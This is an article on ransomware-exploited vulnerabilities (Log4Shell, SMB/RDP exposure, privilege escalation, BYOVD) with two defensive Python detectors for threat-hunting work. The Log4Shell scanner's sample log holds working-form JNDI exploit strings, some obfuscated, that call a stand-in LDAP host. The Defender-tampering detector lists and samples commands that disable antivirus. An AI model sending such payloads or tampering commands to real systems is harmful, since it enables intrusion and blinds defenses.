In 2023 there are two kinds of organizations: those that have already been hit by ransomware and those that will be targeted soon. The current state of cybersecurity resembles an arms race between ransomware groups and security professionals: defenders develop tools and strategies to counter the groups, the groups adapt, and the cat-and-mouse game becomes a war of attrition with no clear winner. While some of the situation is beyond an IT team's control, there are a number of measures that reduce the chance of a ransomware attack succeeding.
According to research from Securin, hundreds of vulnerabilities associated with ransomware are exposed across organizations. A brief overview of the four most prevalent categories that every organization should be aware of follows.
1- Vulnerability allowing intruders to enter the network
According to the research conducted by Securin, external remote services, VPNs, and public-facing applications account for 133 ransomware-related vulnerabilities that can be exploited for initial access.
External remote services, including Windows Server Message Block (SMB) and Microsoft Remote Desktop Protocol (RDP), have become far more common since the outbreak of the pandemic and the shift to work from home (WFH). Where they are misconfigured or run a widely exploited technology, they are easy targets. For instance, WannaCry in 2017, one of the largest ransomware attacks in history, spread by exploiting an SMBv1 vulnerability (MS17-010, the EternalBlue exploit). Log4Shell (CVE-2021-44228) affected 176 products from 21 vendors and has been exploited by six ransomware groups, including Conti and AvosLocker, and many other vulnerabilities of this kind remain unpatched. A practical first check is an external inventory: SMB (TCP 445) and RDP (TCP 3389) should not be reachable from the internet at all, and VPN gateways and public applications should be on a known, patched version.
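As an added example, not part of the original article or of Securin's research, the following Python script scans web-server access logs for Log4Shell exploitation attempts, the kind of initial-access probe described above. It normalizes the request, referrer and user-agent fields (URL-decoding twice and collapsing the `${lower:...}`, `${upper:...}` and `${x:-y}` lookups attackers use to hide the string) before matching `jndi:`. The log lines and IP addresses are constructed for this example, and the combined log format parsed here is an assumption about how the server writes its access log.

```python
import re
from urllib.parse import unquote

# Innermost Log4j lookup: a ${...} whose body contains no nested '${' or '}'.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup using any transport seen in Log4Shell exploitation.
JNDI = re.compile(r"jndi:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)://", re.IGNORECASE)
# Loose parser for a combined-format access log line (the format is an assumption).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \S+ \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def resolve_lookups(text: str) -> str:
    """Collapse the lookups attackers use to obfuscate the payload:
    ${lower:J} -> j, ${upper:x} -> X, ${env:NaN:-j} or ${::-j} -> j
    (Log4j's ':-' default-value syntax). Any lookup this function does not
    understand, in particular ${jndi:...}, is left intact for inspection.
    Every substitution shortens the string, so the loop always terminates."""

    def _resolve(m: re.Match) -> str:
        body = m.group(1)
        if body.lower().startswith("lower:"):
            return body[6:].lower()
        if body.lower().startswith("upper:"):
            return body[6:].upper()
        if ":-" in body:
            return body.split(":-", 1)[1]
        return m.group(0)  # unknown lookup: keep verbatim

    while True:
        resolved = LOOKUP.sub(_resolve, text)
        if resolved == text:
            return text
        text = resolved


def normalize(field: str) -> str:
    """URL-decode twice (double encoding is common) and then resolve lookups."""
    return resolve_lookups(unquote(unquote(field)))


def scan_log(lines):
    """Return a list of (line_no, source_ip, field, normalized_value) for every
    request field that contains a JNDI lookup once the obfuscation is stripped."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # unexpected format; a real pipeline would count these
        for field in ("req", "ref", "ua"):
            value = normalize(m.group(field))
            if JNDI.search(value):
                hits.append((line_no, m.group("ip"), field, value))
    return hits


# Constructed sample log: three exploitation attempts (plain, lookup-obfuscated
# in the User-Agent, URL-encoded) and two benign requests. IPs are documentation
# ranges, not real hosts.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /?x=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '198.51.100.4 - - [10/Dec/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 2048 "https://example.test/" "Mozilla/5.0"',
    '198.51.100.5 - - [10/Dec/2021:12:00:05 +0000] "GET /search?q=price%20${lower:USD} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, ip, field, value in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {ip} via {field}: {value}")
```

The normalization step is the part worth copying: a signature on the literal string `${jndi:` misses the second and third lines, while matching after lookup resolution catches all three. The `${date:...}` and `${sys:...}` lookups are deliberately left unresolved, since an unexpected lookup in a request is itself worth a look.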
2- Vulnerability requiring user’s action
Note that "vulnerability" refers not only to software or hardware flaws but also to user mistakes; in fact, a significant share of ransomware attacks begin this way. By posing as a friend, colleague, or supervisor of the victim, ransomware groups get users to open email attachments, links, or files that inadvertently execute malicious code. As users become more observant, attackers in turn adjust their lures and tools.
A human problem calls for a human response: proper, intensive face-to-face training in which IT team members teach employees from other departments how to recognise potential threats, and what to do if they accidentally let someone into the system. IT departments must keep up with social-engineering trends and routinely tell the company what to watch out for.
3- Vulnerability allowing advanced access
The vulnerabilities discussed so far cover the ways hackers try to break into your network. Sadly, that is usually only the first step. Once attackers have exploited a vulnerability to gain access, they can exploit additional vulnerabilities, those that permit privilege escalation, to run malicious software and take deeper control of the network. In other words, an attacker who knows which vulnerabilities are active in your system can turn a restricted account into an administrator account with access to far more sensitive data.
According to the Securin research mentioned above, there are 75 ransomware-related vulnerabilities that could allow ransomware groups to escalate privileges and move across organizational domains, including privilege escalation flaws in the Windows Common Log File System (CLFS) driver and in Microsoft Exchange Server.
4- Vulnerability allowing stealthy access
Hackers use techniques such as disabling security software or bypassing controls on script execution to operate inside compromised networks without being detected. Mark-of-the-Web bypass (MITRE ATT&CK T1553.005) is a typical example: ransomware groups deliver payloads inside file formats that do not carry or propagate the Mark-of-the-Web flag, so the warnings and controls tied to that flag never fire.
BlackByte, a newer ransomware group about which the FBI issued a warning last year, is, according to ZDNet, known for a technique "allowing attacks to bypass security products' detection by exploiting vulnerabilities in more than 1,000 drivers of anti-virus software." This approach, known as "Bring Your Own Vulnerable Driver" (BYOVD), is a significant and alarming development in the fight against ransomware: the attacker installs a legitimately signed but vulnerable third-party driver and uses its flaw to gain kernel-level access and switch off security tools, so a valid driver signature alone is no assurance.
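As an added example, not taken from the article, the FBI or ZDNet, the following Python detection logic shows what a SOC can watch for against the two techniques in this section: commands that disable or weaken Microsoft Defender (ATT&CK T1562.001) and kernel drivers loaded from user-writable locations or matching a denylist of known-vulnerable drivers (BYOVD). The events are constructed in a Sysmon-like shape (Event ID 1 process creation, Event ID 6 driver load); the hostnames, paths, driver name, signer and hash values are placeholders, and in practice the denylist would be populated from a curated source such as the LOLDrivers project.

```python
import re

# Commands that disable or weaken Microsoft Defender or stop its service
# (ATT&CK T1562.001, Impair Defenses: Disable or Modify Tools).
TAMPER_PATTERNS = [
    re.compile(r"Set-MpPreference\s+-Disable\w+", re.IGNORECASE),
    re.compile(r"Add-MpPreference\s+-Exclusion\w+", re.IGNORECASE),
    re.compile(r"\bsc(?:\.exe)?\s+(?:stop|delete|config)\s+WinDefend\b", re.IGNORECASE),
    re.compile(r"DisableAntiSpyware", re.IGNORECASE),
]

# Constructed denylist of SHA-256 values for known-vulnerable drivers. The
# value here is a placeholder; a real list would come from a curated source.
VULNERABLE_DRIVER_SHA256 = {"A" * 64}

# Locations a driver is normally loaded from on Windows (lower-cased prefixes).
TRUSTED_DRIVER_DIRS = (
    "c:\\windows\\system32\\drivers\\",
    "c:\\windows\\system32\\driverstore\\",
)


def parse_hashes(field: str) -> dict:
    """Sysmon's Hashes field looks like 'SHA1=...,MD5=...,SHA256=...,IMPHASH=...'."""
    return dict(part.split("=", 1) for part in field.split(",") if "=" in part)


def check_event(event: dict) -> list:
    """Return (technique, reason) findings for one Sysmon-style event."""
    findings = []
    event_id = event.get("EventID")
    if event_id == 1:  # process creation
        cmd = event.get("CommandLine", "")
        for pattern in TAMPER_PATTERNS:
            if pattern.search(cmd):
                findings.append(("T1562.001 security tool tampering", f"command line: {cmd}"))
                break
    elif event_id == 6:  # driver load
        # The Signed/Signature fields are deliberately not used as an allow
        # signal: BYOVD drivers carry a valid third-party signature.
        path = event.get("ImageLoaded", "")
        sha256 = parse_hashes(event.get("Hashes", "")).get("SHA256", "").upper()
        if sha256 in VULNERABLE_DRIVER_SHA256:
            findings.append(("BYOVD driver load", f"hash on vulnerable-driver denylist: {path}"))
        if not path.lower().startswith(TRUSTED_DRIVER_DIRS):
            findings.append(("BYOVD driver load", f"driver loaded from untrusted location: {path}"))
    return findings


def scan_events(events):
    """Run check_event over a batch and tag each finding with its host."""
    return [(ev.get("Host", "?"), technique, reason)
            for ev in events for technique, reason in check_event(ev)]


# Constructed events: two Defender-tampering commands and a third-party driver
# loaded from a temp directory on ws01, then a normal driver load and a benign
# process on other hosts. Names and hashes are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "Host": "ws01",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"EventID": 1, "Host": "ws01", "Image": "C:\\Windows\\System32\\sc.exe",
     "CommandLine": "sc.exe stop WinDefend"},
    {"EventID": 6, "Host": "ws01",
     "ImageLoaded": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\overclock64.sys",
     "Signed": "true", "Signature": "Example Hardware Co.",
     "Hashes": "SHA256=" + "A" * 64},
    {"EventID": 6, "Host": "srv02",
     "ImageLoaded": "C:\\Windows\\System32\\drivers\\tcpip.sys",
     "Signed": "true", "Signature": "Microsoft Windows",
     "Hashes": "SHA256=" + "B" * 64},
    {"EventID": 1, "Host": "ws03", "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe C:\\Users\\jdoe\\notes.txt"},
]

if __name__ == "__main__":
    for host, technique, reason in scan_events(SAMPLE_EVENTS):
        print(f"{host}: {technique}: {reason}")
```

The two driver checks are independent on purpose: the hash denylist catches drivers already known to be abused, while the path check catches a driver that is not yet on any list but has been dropped into a user-writable directory, which is where a BYOVD payload usually lands before it is loaded.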
Ransomware continues to grow, and every organization, regardless of sector or size, may face such an attack, because no system can be guaranteed completely protected. What organizations can do is avoid simple errors through appropriate employee training, a deeper understanding of their own systems' vulnerabilities, and appropriate remediation. The war against ransomware may not end soon, but we can take measures to limit the losses.
According to Cyber Security